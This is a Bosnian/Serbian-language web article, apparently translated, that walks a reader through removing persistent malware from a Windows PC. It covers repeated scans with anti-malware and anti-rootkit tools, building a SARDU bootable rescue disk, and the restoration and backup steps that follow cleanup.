Sada ponovo pokrenite računar. Nakon ponovnog pokretanja, ponovo provjerite svoj računar koristeći savjete koje sam dao u članku "". Ako je sve u redu, onda možete preskočiti na odjeljak "". Zapamtite, onemogućeni unosi u registar nisu opasni. Također, imajte na umu da čak i ako je vaš računar čist od aktivnih infekcija, na njemu i dalje mogu biti dijelovi zlonamjernog softvera. Nisu opasni, ali nemojte se iznenaditi ako skeniranje u drugom programu ipak pronađe zlonamjerni softver na vašem računalu. Ovo su uspavani ostaci onoga što ste upravo izbrisali. Ako niste zadovoljni prisustvom ovih ostataka na vašem računaru, tada možete ukloniti veliku većinu njih skeniranjem u programima navedenim u sljedećem odjeljku.

Međutim, ako vaš računar još nije očišćen od aktivnih infekcija, ali je barem jedan od programa uspio da se pokrene, ponovo prođite kroz korake opisane u ovom odjeljku i provjerite hoće li to ukloniti infekcije. Ali, ako nijedan od programa nije mogao da se pokrene, pređite na sledeći odeljak. Osim toga, čak i ako ponavljanje instrukcija u ovom odeljku nije dovoljno za čišćenje računara, moraćete da pređete na sledeći odeljak.

2.2 Ako računar i dalje nije čist, skenirajte pomoću HitmanPro, Malwarebytes i Emsisoft Anti-Malware

Ako gornji koraci nisu u potpunosti eliminirali infekciju, trebate preuzeti HitmanPro sa ove stranice. Instalirajte program i pokrenite "Default Scan". Ako se ne instalira, idite na sljedeći paragraf i instalirajte Malwarebytes. Kada se od vas zatraži tokom instalacije HitmanPro-a, preporučujem da odaberete opciju da izvršite samo jednokratno skeniranje vašeg računara. Ovo bi trebalo biti u redu za većinu korisnika. Također, ako zlonamjerni softver sprječava da se ispravno pokrene, otvorite program držeći pritisnutu tipku CTRL dok se ne učita u memoriju. Stavite u karantin svaku infekciju koju pronađe. Imajte na umu da će ovaj program moći ukloniti infekcije samo 30 dana nakon instalacije. Tokom deinstalacije, od vas će se tražiti da aktivirate probnu licencu.

Nakon što HitmanPro ukloni sve otkrivene infestacije, ili ako Hitman Pro nije uspio da se instalira, morate preuzeti besplatnu verziju Malwarebytes-a sa ove stranice. Imajte na umu da ima kameleon tehnologiju koja bi mu trebala pomoći da se instalira čak i na jako zaraženim računarima. Preporučujem da poništite izbor u polju za potvrdu "Omogući besplatnu probnu verziju Malwarebytes Anti-Malware Pro" za vrijeme instalacije. Provjerite je li program u potpunosti ažuriran, a zatim pokrenite brzo skeniranje. Stavite u karantin svaku infekciju koju pronađe. Ako bilo koji program zatraži ponovno pokretanje računara, obavezno ga ponovo pokrenite.

Zatim preuzmite Emsisoft Emergency Kit sa ove stranice. Kada završi preuzimanje, izvucite sadržaj zip datoteke. Zatim dvaput kliknite na datoteku pod nazivom "start" i otvorite "Emergency Kit Scanner". Kada se to od vas zatraži, pustite programu da ažurira bazu podataka. Kada se ažurira, vratite se na meni Sigurnost. Zatim idite na "Provjeri" i odaberite "Brzo", a zatim kliknite na "Provjeri". Kada se skeniranje završi, stavite u karantin sve pronađene stavke. Ponovo pokrenite računar kad god je potrebno.

Nakon skeniranja vašeg računara ovim programima, morate ga ponovo pokrenuti. Zatim ponovo provjerite svoj računar koristeći savjete koje sam dao u članku "". Ako je sve u redu onda možete preskočiti na odjeljak "". Zapamtite, onemogućeni unosi u registar nisu opasni. Međutim, ako vaš računar i dalje nije očišćen, ponovo prođite kroz korake u ovom odeljku i pogledajte da li pomaže u uklanjanju infekcija. Ako programi u odjeljku 2.1 prethodno nisu mogli ispravno raditi, trebali biste se vratiti i pokušati ih ponovo pokrenuti. Ako nijedan od gore navedenih programa nije mogao da se pokrene, pokrenite Safe Mode sa umrežavanjem i pokušajte da skenirate odatle. Međutim, ako su uspjeli ispravno pokrenuti, a prijetnje i dalje ostaju čak i nakon ponovnog praćenja savjeta iz ovog odjeljka, tada možete preskočiti na sljedeći odjeljak.

2.3 Isprobajte ove sporije metode ako je potrebno

Ako gore navedene mjere nisu u potpunosti uklonile infekciju, onda neki vrlo neodgovarajući zlonamjerni softver vjerojatno živi u vašoj mašini. Stoga su tehnike o kojima se govori u ovom odeljku mnogo moćnije, ali će im trebati više vremena. Prvo što vam savjetujem je da skenirate svoj računar drugim anti-rootkit skenerom koji se zove GMER. Može se preuzeti sa ove stranice. Izbrišite sve što je zasjenjeno crvenom bojom. Obavezno kliknite na dugme Skeniraj odmah nakon što program završi brzu analizu sistema. Osim toga, ako koristite 32-bitni operativni sistem, morate preuzeti program da biste pronašli i uklonili ZeroAccess rootkit. Informacije o ovom rootkitu i link do programa za njegovo uklanjanje sa 32-bitnih sistema možete pronaći ovdje na. AntiZeroAccess se može preuzeti sa linka u drugom paragrafu.

Nakon skeniranja u gore navedenim programima, otvorite CCE, idite na postavke i odaberite opciju "Skeniraj za sumnjivu MBR modifikaciju". Zatim kliknite na "OK". Sada u CCE uradite kompletno skeniranje. Ponovo pokrenite sistem kada je potrebno i stavite u karantin sve što se nađe. Imajte na umu da ova opcija može biti relativno opasna jer može identificirati probleme tamo gdje ih nema. Koristite ga pažljivo i provjerite jeste li napravili sigurnosnu kopiju bilo čega važnog. Imajte na umu da u rijetkim slučajevima skeniranje s ovim opcijama može učiniti da sistem ne može da se pokrene. Ovo se retko dešava, ali čak i ako se dogodi, to je popravljivo. Ako vaš računar prestane da se pokreće nakon izvođenja ovog skeniranja, koristite instalacioni disk za Windows da biste vratili sistem. Ovo bi trebalo da pomogne da se računar ponovo pokrene.

Kada se CCE u potpunosti završi, ponovo otvorite CCE držeći pritisnutu tipku SHIFT. Ova radnja će ubiti većinu nepotrebnih procesa koji bi vas mogli spriječiti u skeniranju. Zatim otvorite KillSwitch, idite na meni "Prikaz" i odaberite "Sakrij sigurne procese". Sada još jednom uklonite sve opasne procese. Zatim biste također trebali kliknuti desnim tasterom miša na sve nepoznate procese koji su ostali i odabrati "Kill Process". Nemojte ih brisati. trebali biste slijediti savjete iz ovog paragrafa svaki put kada ponovo pokrenete računar kako biste bili sigurni da će sljedeća skeniranja biti što efikasnija.

Nakon što završite sve procese koji se nisu smatrali pouzdanim, trebali biste otvoriti HitmanPro program držeći pritisnutu tipku CTRL. Zatim izvršite "Default Scan" i stavite u karantin sve što pronađe. Zatim izvršite potpuno skeniranje u Malwarebytes-u i Emsisoft Emergency Kit-u. Stavite u karantin šta god nađu. Zatim preuzmite besplatnu verziju SUPERAntiSpywarea sa ove stranice. Tokom instalacije, budite veoma oprezni jer drugi programi dolaze uz instalater. Na prvoj stranici obavezno poništite obje opcije u vezi sa instalacijom Google Chromea. Sada odaberite opciju "Prilagođena instalacija". Tokom prilagođene instalacije, morat ćete ponovo poništiti dva polja za potvrdu iz opcije dodaj Google Chrome.

Osim toga, program će se dobro instalirati. Kada se od vas zatraži da započnete besplatni probni period, savjetujem vam da se odjavite. Kada se program u potpunosti učita, odaberite opciju Complete Scan i kliknite na dugme "Skeniraj računar...". Zatim kliknite na dugme "Pokreni kompletno skeniranje>". Izbrišite sve otkrivene datoteke i ponovo pokrenite računar kada je potrebno.

Nakon što završite ove korake, morate ponovo pokrenuti računar. Zatim provjerite ponovo koristeći savjete koje sam dao u članku "". Ako je sve u redu, onda možete preskočiti na odjeljak "". Zapamtite, onemogućeni unosi u registar nisu opasni. Međutim, ako vaš računar još uvijek nije očišćen, slijedite korake u ovom odeljku ponovo i pogledajte da li ovo pomaže u eliminaciji infekcije. Ako ne, onda morate prijeći na sljedeći odjeljak.

2.4 Napravite disk za pokretanje ako je potrebno

Ako gore navedene metode nisu u potpunosti eliminisale infekciju, ili ako ne možete ni da pokrenete računar, tada će vam za čišćenje računara možda trebati CD za pokretanje (ili fleš disk), koji se naziva i disk za pokretanje. Znam da ovo možda zvuči komplikovano, ali zaista i nije tako loše. Samo zapamtite da kreirate ovaj disk na računaru koji nije zaražen. U suprotnom, datoteke mogu biti oštećene ili čak zaražene.

Budući da je ovo disk za pokretanje, nijedan zlonamjerni softver ne može se sakriti od njega, onemogućiti ga ili na bilo koji način ometati njegov rad. Stoga bi skeniranje u različitim programima na ovaj način trebalo omogućiti čišćenje gotovo svake mašine, ma koliko zaražena bila. Jedini izuzetak je ako su sistemske datoteke same zaražene na mašini. Ako je tako, uklanjanje zaraze može oštetiti sistem. Uglavnom iz tog razloga ste napravili sigurnosnu kopiju svih važnih dokumenata prije početka procesa čišćenja. Međutim, ponekad ovo možete zaobići slijedeći savjete koje dajem u nastavku.

Da biste to učinili, morate preuzeti. To je odličan program koji će vam omogućiti da napravite jedan disk za pokretanje sa nekoliko antivirusnih programa. Također ima mnogo drugih korisnih funkcija o kojima neću raspravljati u ovom članku. Nekoliko vrlo korisnih tutorijala za SARDU možete pronaći ovdje na ovoj stranici. Budite vrlo pažljivi s dodatnim prijedlozima koji su sada uključeni u instalateru. Nažalost, ovaj program sada pokušava prevariti ljude da instaliraju dodatne programe koji su uglavnom nepotrebni.

Nakon preuzimanja, raspakirajte sadržaj i otvorite SARDU folder. Zatim pokrenite izvršnu datoteku koja odgovara vašem operativnom sistemu - sardu ili sardu_x64. Na kartici Antivirus kliknite na antivirusne aplikacije koje želite da snimite na disk koji kreirate. Možete dodati onoliko ili malo koliko vam odgovara. Preporučujem da skenirate svoj računar barem pomoću Dr.Web LiveCD-a, Avira Rescue System i Kaspersky Rescue Disk. Jedna od dobrih stvari kod Dr.Web-a je to što ponekad ima mogućnost da zamijeni zaraženu datoteku njegovom čistom verzijom, umjesto da je samo izbriše. Ovo će vam pomoći da očistite neke računare bez oštećenja sistema. Stoga, toplo preporučujem da uključite Dr.Web u svoj disk za pokretanje.

Klikom na nazive raznih antivirusnih aplikacija često ćete se usmjeriti na stranicu s koje možete preuzeti ISO sliku s odgovarajućim antivirusom. Ponekad će vam se, umjesto toga, dati mogućnost da ga preuzmete direktno putem SARDU-a, koji se može pronaći pod karticom Downloader. Ako imate izbora, uvijek odaberite opciju preuzimanja ISO-a. Također, nakon preuzimanja ISO datoteke, možda ćete je morati premjestiti u ISO mapu koja se nalazi u glavnoj SARDU mapi. Kada premestite ISO-ove svih antivirusnih proizvoda koje želite u ISO fasciklu, spremni ste da kreirate disk za hitno pokretanje. Da biste to učinili, idite na karticu Antivirus i provjerite jesu li označeni svi antivirusi koje ste odabrali. Sada kliknite na dugme za kreiranje za USB uređaj ili disk. Bilo koja od ovih opcija će biti prihvatljiva. Zavisi samo da li želite da pokrenete disk za spašavanje sa USB-a ili sa CD-a.

Nakon kreiranja diska za spasavanje, verovatno ćete morati da promenite redosled pokretanja u postavkama BIOS-a kako biste bili sigurni da kada ubacite CD za pokretanje ili fleš uređaj za pokretanje, računar ga pokreće, a ne operativni sistem kao obično. Za naše potrebe, trebalo bi da promenite redosled tako da prva stavka bude "CD/DVD Rom drajv" ako želite da pokrenete sistem sa CD-a ili DVD-a, ili "Removable Devices" ako želite da pokrenete sistem sa fleš diska. Kada to učinite, pokrenite računar sa diska za spasavanje.

Nakon pokretanja s diska, možete odabrati s kojim antivirusom želite započeti skeniranje vašeg računara. Kao što sam ranije spomenuo, preporučio bih da počnete sa Dr.Web-om. Kada ovaj program završi i vratite ili izbrišete sve što pronađe, moraćete da isključite računar. Zatim se obavezno ponovo podignite s diska, a zatim nastavite skeniranje u drugim antivirusima. Nastavite sa ovim procesom dok ne skenirate računar sa svim antivirusnim programima koje ste upisali na disk za pokretanje.

Nakon čišćenja računara programima koje ste snimili na disk, sada morate ponovo pokušati pokrenuti Windows. Ako se računalo može pokrenuti iz Windows-a, provjerite to prema uputama koje dajem u članku "". Ako je sve u redu, onda možete preskočiti na odjeljak "". Zapamtite, onemogućeni unosi u registar ne mogu biti ugroženi.

Ako vaš računar još nije očišćen, ali možete pokrenuti sistem iz Windows-a, savjetovao bih vam da pokušate da ga očistite dok ste u Windows-u, počevši od ovog članka i slijedeći predložene metode. Međutim, ako vaš računar i dalje ne može da pokrene Windows, pokušajte ponovo da ga sredite koristeći Windows instalacioni disk. Ovo bi trebalo da pomogne da se računar ponovo pokrene. Ako čak ni ovo ne pomogne da ga pokrenete, pokušajte da dodate još antivirusa na disk za hitno pokretanje i zatim ponovo skenirajte računar. Ako ovo i dalje ne pomogne, čitajte dalje.

3. Šta učiniti ako gore navedene metode nisu pomogle pri čišćenju vašeg računara

Ako ste slijedili sve gore navedene upute i još uvijek niste mogli očistiti svoj računar, ali ste uvjereni da su problemi uzrokovani zlonamjernim softverom, bili bismo vam jako zahvalni ako ostavite komentar i objasnite šta ste pokušali učiniti da očistite svoj računar, i šta su ostali znakovi koji vas navode da mislite da vaš računar još uvijek nije očišćen. Ovo je veoma važno za poboljšanje ovog članka. Zaista se nadam da niko nikada neće doći do ovog odjeljka. Ovaj članak ima za cilj da vam pruži mogućnost da potpuno očistite zaraženi računar.

Također možete potražiti savjet na posebnom forumu za uklanjanje zlonamjernog softvera. Veoma koristan forum, koji je naš partner -. Međutim, ako, čak i nakon traženja pomoći na forumu za uklanjanje zlonamjernog softvera, vaš računar još uvijek nije bez zlonamjernog softvera, možda ćete morati formatirati svoje računalo i tako ga pokrenuti. To znači da ćete izgubiti sve što niste prethodno kopirali. Ako to učinite, obavezno u potpunosti formatirajte svoj računar prije ponovne instalacije Windowsa. Ovo će eliminirati gotovo svaku vrstu zlonamjernog softvera. Nakon što se Windows ponovo instalira, slijedite korake u.

4. Šta učiniti nakon što se sav zlonamjerni softver konačno identificira za uklanjanje

Nakon što se uvjerite da je vaš računar očišćen, sada možete pokušati vratiti sve što je izgubljeno. Možete koristiti Windows Repair (All In One), sve-u-jednom alat koji popravlja veliki broj poznatih Windows problema, uključujući greške registratora, dozvole za datoteke, Internet Explorer, Windows ažuriranja, Windows zaštitni zid. Ako, nakon završetka svih procedura, vaš računar radi normalno, tada možete otvoriti i Comodo Autorun Analyzer i odabrati opciju za brisanje onih unosa u registratoru koje ste upravo ranije onemogućili. Dakle, oni više uopće neće biti na vašem računaru.

Nakon što ste bezbedno uklonili sve infiltracije sa svog računara i uklonili ostatke razornih posledica, morate preduzeti korake da se ovo više ne ponovi. Iz tog razloga sam napisao vodič "Kako ostati siguran na mreži" (koji će uskoro biti objavljen na našoj stranici). Pročitajte ga kasnije i implementirajte metode za koje mislite da najbolje odgovaraju vašim potrebama.

Nakon što osigurate svoj računar, sada možete oporaviti bilo koju datoteku izgubljenu tokom procesa čišćenja za koju je prethodno napravljena sigurnosna kopija. Nadamo se da ovaj korak neće morati da se uradi. Takođe, pre nego što ih vratite, uverite se da je vaš računar veoma dobro zaštićen. Ako ne zaštitite svoj računar u dovoljnoj meri, možete ga slučajno zaraziti, a zatim ćete morati ponovo da čistite infekciju na njemu. Osim toga, ako ste koristili USB uređaj za premještanje datoteka na zaraženi računar, sada ga možete umetnuti nazad u računar i provjeriti da na njemu nema zlonamjernog softvera. Preporučujem da to učinite tako što ćete izbrisati sve preostale datoteke na njemu.

Pronašli ste grešku u kucanju? Pritisnite Ctrl + Enter

Top srodni članci